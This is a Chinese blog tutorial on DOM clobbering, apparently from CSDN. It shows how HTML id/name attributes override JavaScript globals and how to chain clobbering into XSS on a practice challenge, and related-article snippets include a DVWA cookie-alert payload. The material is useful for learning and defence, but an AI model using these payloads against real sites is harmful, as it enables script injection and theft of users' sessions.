Dom破坏(Dom Clobbering)

已于 2023-09-30 19:18:58 修改
阅读量138 收藏
点赞数
分类专栏: 安全 文章标签: javascript html
于 2023-09-30 19:13:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57507186/article/details/133439414
版权

什么是 DOM?

文档对象模型 (DOM) 是 Web 文档的编程接口。DOM 将文档表示为节点和对象; 这样,编程语言就可以与页面交互。作为网页的面向对象表示形式,可以使用脚本语言(如 JavaScript)对其进行修改。

原理

<body>
    <img id="x">
    <img name="y">
</body>
<script>
    console.log(x);
    console.log(y);
    console.log(document.x);
    console.log(document.y);
    console.log(window.x);
    console.log(window.y);
</script>

执行后会发现除了document情况下不能通过id取到标签外,其余方式都可以通过id和name取到标签。

因为文档对象模型(DOM)允许JavaScript对其进行操作。我们可以对HTML插入特定id或name的标签,来达到执行命令时使命令错误的指向我们自定义标签的目的。

例如document.cookie 是用来创建 、读取、及删除cookie,如果我们创建一个<img name="cookie">标签,那么执行document.cookie时就会取到这个标签。

执行下面这段代码,本意是向body里插入一个div标签

<body>
    <form name="body">
        <img id="appendChild">
    </form>
</body>
<script>
    var div = document.createElement('div');
    document.body.appendChild(div)
</script>

执行后报错Uncaught TypeError: document.body.appendChild is not a function,可以看到我们多层覆盖掉了document.body.appendChild ⽅法。

如何利用Dom Clobbering?

以上举的例子中我们创建或者覆盖都是标签,类型为HTMLElment对象,我们需要将其转换为⼀个可控的字符串类型,以便我们进⾏操作。

因此我们需要在创建标签时调用toString方法将其转换成字符串类型的标签。但并非所有标签的toString方法都对我们有用

Object.prototype.toString.call(document.body.appendChild)
'[object Function]'

显然上面的字符串就没用。

我们需要在window全局变量下所有元素中寻找我们需要的特定标签,需求为自身重写toString方法的标签。

Object.getOwnPropertyNames(window)
        .filter(p => p.match(/Element$/))
        .map(p => window[p])
        .filter(p => p && p.prototype && p.prototype.toString
            !== Object.prototype.toString)

我们可以得到两种标签对象:HTMLAreaElement (<area>) & HTMLAnchorElement (<a>) ,这两个标签对象我们都可以利用href属性来进行字符串转换。

<a>的toString方法会调用自身的href属性。

针对dom破坏有一道xss的题目:https://xss.pwnfunction.com/warmups/ok-boomer/

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

我们可以这样利用

https://xss.pwnfunction.com/warmups/ok-boomer/boomer=<a id="ok" href="tel:alret(1)">

需要注意的是:dom破坏适用于覆盖的标签本身没有的情况,如果上面的ok在HTML中本来存在那么就不会成功,当然我们也可以想办法让本身存在的代码失效,再进行dom破坏。

两层结构调用

构建集合关系
<div id=x>
<a id=y href='111'></a>
</div>
<script> 
alert(x.y);
</script>

这里无论第⼀个标签怎么组合,得到的结果都只是undefined。但是我们可以通过另⼀种⽅法加⼊引入name属性就会有其他的效果。

我们可以通 过先构建⼀个HTMLCollection ,再通过collection[name] 的形式来调⽤。

<div id="x">
<a id="x" name=y href="111"></a>
</div>
<script> 
alert(x.y);
</script>
利用原本存在的层级关系

利用HTML标签之间存在的关系来构建层级关系

以下关系可以用来构建层级关系: form->buttonform->fieldsetform->imageform->imgform->inputform->objectform->output

三层结构调用

结合上面的两种方法可以构建出三层调用,先用⼀个HTMLCollection 获取第⼆级,再在第⼀个表单中用output 标签即可。

<form id="x" name="y"><output id=z>I've been clobbered</output></form>
<form id="x"></form>
<script> 
alert(x.y.z.value);
</script>
小鹿乱创
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA靶场练习十—XSS (DOM)
afei001
06-30 359
一、低级(Low Level) 尝试直接在URL中注入: <script>alert(document.cookie)</script> 成功返回Cookie。      源码分析: <?php # No protections, anything goes ?> 分析:     可以看到,该源码中没有任何内容,没有做任何xss防护。容易造成xss DOM攻击。   二、中级(Medium Level) 首先查看源码: <?php // Is the.
DOM clobberingDOM破坏
m0_63306943的博客
04-02 464
alert(x.y);执行结果:这里无论第一个标签怎么组合,得到的结果都只有undefined。所以说标签不能乱取。
XSS当中的DOM clobbering
rv0p111
08-11 579
DOM clobberingHow to exploit DOM-clobbering vulnerabilitiesExploiting DOM clobbering to enable XSS 主要是学习了下这个相关的知识点,目的只是想要记录下分析过程,介绍的话就直接引用相关文章的内容了 DOM 破坏是一种将 HTML 注入页面以操作 DOM 并最终更改页面上 JavaScript 行为的技术。DOM clobbering 在XSS不可能的情况下特别有用,但您可以控制页面上的某些 HTML,其中属性i
DOM Clobbering的原理及应用
m0_46467017的博客
08-02 295
现在请你用最短的代码,实现出点击按钮时会跳出alert(1)这个功能。那如果要让代码最短,你的答案会是什么?
Dom-clobbering原理和例题
vt_yjx的博客
09-04 461
上面2、3、4这三个都是用的id和name取值,还是有一定限制,如果自定义属性就方便多了这个脚本可以过滤出能够自定义属性的for(i=0;i++){obj =try {得到能利用的:a:usernamea:password<script></script>
XSS注入进阶练习篇(二)DOM型XSS注入深入
好好睡觉
02-19 2683
DOM型XSS,SVG绕过WAF、DOM 破坏
Mastering.Modern.Web.Penetration.Testing
12-01
Some lesser discussed attack vectors such as RPO (relative path overwrite), DOM clobbering, PHP Object Injection and etc. has been covered in this book. We'll explain various old school techniques ...
tw.org:tw.org网站的存储库
04-27
克隆此存储库: git clone tw.org/html/tools更新说明首次使用时,请生成API令牌并将其安全存储以备后用: :不需要特殊的范围然后设置Python 3环境: # Create a virtual environment to avoid clobbering global ...
dom型xss ---(waf绕过)
m0_63306943的博客
04-05 1181
DOM 是文档对象化模型(Document Object Model)的简称。DOM Tree 是指通过 DOMHTML 页面进行解析,并生成的 HTML tree 树状结构和对应访问方法。借助DOM Tree,我们能直接而且简易的操作HTML页面上的每个标记内容DOM技术被Internet Explorer 5.0及以上版本的浏览器所支持,它采取一种非常直观且一致的方式将HTML文档进行模型化处理,并借此提供访问、导航和操作页面的简易编程接口。
通过id获取input标签元素对象_学点新姿势: 通过DOM Clobbering 引发GMail的的XSS
weixin_39714275的博客
11-29 442
什么是AMP4EmailAMP4Email(也称为动态邮件)是Gmail的一项新功能,可使电子邮件包含动态HTML内容。尽管编写包含HTML标签的电子邮件已经存在了很多年,但通常情况下都是假定HTML只包含静态内容,即某种格式,和一些图像等,而没有任何脚本形式的存在。AMP4Email应该算是创新的更进了一层,它允许编写包含HTML标签的电子邮件并允许电子邮件中包含动态内容。在Google官方G ...
html DOM 变化 通知,很好很强大
weixin_34238642的博客
09-22 107
刚做一个项目,某个div标签显示后 需要接收一个事件,用于主动调用 window.resize(); 从网上找了了,发现MutationObserver。给开发者们提供了一种能在某个范围内的DOM树发生变化时作出适当反应的能力。 测试代码如下。保存成html文件即可运行 1 <html> 2 <head> 3 <title><...
DOM破坏攻击学习
蚁景网安学院
04-16 683
01前言最近看到好多师傅都已经学习过了DOM Clobbering Attack,因此自己也来学习一波。020x01 简介DOM最初诞生的时候没有一个很好的标准,以至于各个浏览器在实现...
title属性样式 原生dom_DOM破坏攻击学习
weixin_33603316的博客
12-28 381
01前言最近看到好多师傅都已经学习过了DOM Clobbering Attack,因此自己也来学习一波。020x01 简介DOM最初诞生的时候没有一个很好的标准,以至于各个浏览器在实现的过程中会支持DOM的一些怪异行为,而这些行为可能会导致DOM Clobbering的发生浏览器可能会将各种DOM元素的name和id属性添加为document的属性或页面的全局变量,这会导致覆盖掉docu...
Gmail中AMP4Email所导致的XSS漏洞
NOSEC2019的博客
11-19 737
这篇文章讲述的是我在2019年8月向谷歌报告的XSS漏洞,和Gmail中的AMP4Email有关,这也是被称为DOM Clobbering攻击手法的具体实现。 什么是AMP4Email AMP4Email(也称为动态邮件)是Gmail的一个新特性,它能让电子邮件包含动态HTML内容。虽然很久以前就能编写含有HTML标记的电子邮件,但这通常只包是静态内容,即某种格式、图像等,不含任何脚本或表单。而...
GMail XSS 漏洞分析
neal1991的专栏
11-20 1194
原文:https://research.securitum.com/xss-in-amp4email-dom-clobbering/ 译者:https://github.com/neal1991 这篇文章是我在2019年8月通过 Google 漏洞奖励计划报告的 AMP4Email 中已经修复的 XSS 的文章。该 XSS 是对著名浏览器问题 DOM Clobbering 的真实利用案例。 ...
[Vue-常见错误]浏览器显示Uncaught runtime errors
一个喜欢什么都研究一下的小小后端程序员
06-09 316
在vue.config.js中配置关闭Uncaught runtime errors显示。
基于JavaScript 如何实现爬山算法以及优化方案
乐闻世界
06-10 1189
爬山算法(Hill Climbing Algorithm)是一种常见的启发式搜索算法,常用于解决优化问题。其核心思想是从一个初始状态出发,通过逐步选择使目标函数值增大的邻近状态来寻找最优解。接下来,我们将通过 JavaScript 实现一个简单的爬山算法,帮助大家理解其原理和应用。从一个初始状态开始。评估当前状态的目标函数值。在当前状态的邻居中选择一个目标函数值更大的状态。如果找到了更优的邻居,则移动到该邻居并重复步骤2和步骤3。如果没有更优的邻居,则算法结束,当前状态即为局部最优解。
vue3如何定义一个组件
Java程序员专栏
06-09 508
注意在子组件的 <template> 中,你使用 {{ propName }} 来显示传递进来的参数值。在父组件中,你使用 :propName="parentMessage" 来将 parentMessage 数据的值绑定到子组件的 propName prop 上。当使用 <script setup> 语法糖时,你不能直接在 <script> 标签内使用 props 选项。在 Vue 3 中,定义一个可以接收参数的组件通常是通过在组件的 props 选项中定义这些参数来完成的。// 其他组件逻辑...
Harmony 开发的艺术 面向对象
不懂先生的博客
06-13 774
然后你可以创建多个子类,如“圆形”、“矩形”和“三角形”,它们都继承自“形状”类并实现了自己的“绘制”方法。尽管每个对象的类型可能不同(圆形、矩形、三角形等),但由于它们都继承了“形状”类并实现了相同的“绘制”方法,因此你可以通过父类引用来统一调用它们的方法。然后你可以创建一个“狗”类,它继承自“动物”类,并添加或覆盖一些特定的属性和方法(如“叫”和“摇尾巴”)。所以面向对象的三大特征(封装、继承、多态)在java语言中很容易实现的设计,搬到早期的JavaScript中,就变噩梦一样的存在。
JS-12-es6常用知识-async
最新发布
m0_68467925的博客
06-13 535
关键字async作用:声明一个函数为异步函数,允许函数内部使用await关键字等待 Promise 对象的完成。返回值:异步函数总是返回一个 Promise 对象,无论函数内部是否有显式的return语句。如果没有返回语句,函数会隐式地返回一个已解析(resolved)的 Promise,其值为undefined。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值